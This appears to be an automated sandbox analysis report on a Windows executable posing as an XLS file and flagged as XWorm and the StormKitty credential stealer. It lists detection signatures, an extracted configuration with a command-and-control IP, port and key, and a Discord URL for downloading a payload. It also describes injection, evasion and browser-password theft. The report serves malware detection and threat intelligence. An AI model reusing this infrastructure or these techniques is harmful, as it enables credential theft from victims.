Windows Analysis Report
rDoc5633276235623657_xls.exe

Overview

General Information

Sample name:	rDoc5633276235623657_xls.exe
Analysis ID:	1519397
MD5:	d5489da5aa14ed9d71d8338ec41a1bc1
SHA1:	fe04a678f7d95ed31bd364e0a8a4831964f2b84f
SHA256:	96dea95151b45309d8bda1112f842802e852a15ac2173b0023b1ba35deae5ec1
Tags:	exeuser-Porcupine
Infos:

Detection

StormKitty, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected BrowserPasswordDump

Yara detected StormKitty Stealer

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: rDoc5633276235623657_xls.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["178.215.236.218"], "Port": "16433", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rDoc5633276235623657_xls.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack	String decryptor: 178.215.236.218
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack	String decryptor: 16433
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack	String decryptor: <123456789>
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack	String decryptor: USB.exe
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack	String decryptor: %AppData%
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack	String decryptor: XClient.exe

Uses 32bit PE files

Source: rDoc5633276235623657_xls.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: rDoc5633276235623657_xls.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Data.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbeTOT source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr
Source:	Binary string: mscorlib.pdbq source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: HSDSDF32.pdbh source: rDoc5633276235623657_xls.exe
Source:	Binary string: System.Transactions.ni.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbH source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr
Source:	Binary string: \??\C:\Windows\RegAsm.pdbp( source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb8< source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Runtime.Serialization.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\RegAsm.pdb0(G source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdbL} source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb< source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: HSDSDF32.pdb source: rDoc5633276235623657_xls.exe
Source:	Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdba source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Data.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Xml.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: o.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: %%.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp, WER8A2C.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbhk@ source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Management.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Xml.pdb@DHLPhl source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Data.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Core.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Transactions.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbE source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Runtime.Serialization.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Core.pdbxm. source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.pdbDN. source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdb source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Data.pdb, source: WER8A2C.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4x nop then inc dword ptr [ebp-30h]

2_2_06660F28

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49731 -> 178.215.236.218:16433
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 178.215.236.218:16433 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49731 -> 178.215.236.218:16433
Source: Network traffic	Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.4:49737 -> 178.215.236.218:16433
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49737 -> 178.215.236.218:16433
Source: Network traffic	Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49731 -> 178.215.236.218:16433
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 178.215.236.218:16433 -> 192.168.2.4:49731

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 178.215.236.218

Yara detected Generic Downloader

Source: Yara match

File source: Process Memory Space: rDoc5633276235623657_xls.exe PID: 6696, type: MEMORYSTR

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 178.215.236.218:16433

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66f6783b&is=66f526bb&hm=22a3bafe0f63ec86e36ba63ace27289331a1b6e8c8a217e16ac633d8848215f6& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LVLT-10753US LVLT-10753US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218
Source: unknown	TCP traffic detected without corresponding DNS query: 178.215.236.218

Source: global traffic

DNS traffic detected: DNS query: cdn.discordapp.com

Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.comd
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: rDoc5633276235623657_xls.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: places.raw.2.dr	String found in binary or memory: https://support.mozilla.org
Source: places.raw.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.raw.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_seeaCould
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.raw.2.dr	String found in binary or memory: https://www.mozilla.org
Source: places.raw.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: places.raw.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000002.00000002.2656518468.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, tmp743.tmp.dat.2.dr, places.raw.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.raw.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000002.00000002.2656518468.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, tmp743.tmp.dat.2.dr, places.raw.2.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49730 version: TLS 1.2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information set: 01 00 00 00

Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.RegAsm.exe.6ad0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.RegAsm.exe.6ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000002.00000002.2652861730.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1784666277.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Code function: 0_2_02B02B28	0_2_02B02B28
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Code function: 0_2_02B011D8	0_2_02B011D8
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe	Code function: 0_2_02B02B21	0_2_02B02B21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_01334150	2_2_01334150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_01331030	2_2_01331030
